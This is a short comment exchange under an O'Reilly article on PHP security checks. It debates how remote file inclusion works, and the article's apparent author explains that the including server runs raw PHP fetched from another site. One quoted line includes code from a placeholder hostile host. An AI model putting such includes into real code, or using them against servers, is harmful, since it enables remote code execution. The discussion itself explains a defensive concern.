Article:
  Ten Security Checks for PHP, Part 1
Subject:   Not the kind of article i would expect from o'reilly!
Date:   2005-02-06 03:49:12
From:   bbbbbbbbbbbbbb
Response to: Not the kind of article i would expect from o'reilly!

"First, include("http://www.some-BAD-site.com/whatever.php") can't really do any harm, since it is executed on the some-bad-site.com, and not on the targeted machine."


Obviously, you assume that www.some-BAD-site.com is running php.


Then, what if it doesn't,eh? ;)

Main Topics Oldest First

Showing messages 1 through 1 of 1.

  • Not the kind of article i would expect from o'reilly!
    2005-02-06 13:52:17  Clancy Malcolm | O'Reilly Author [View]

    "Obviously, you assume that www.some-BAD-site.com is running php."

    No, in fact it is assumed that www.some-BAD-site.com is NOT running PHP and it provides raw PHP code to the server that runs the include statement. This is the essence of this security risk - the PHP engine will execute PHP code loaded from a different web site.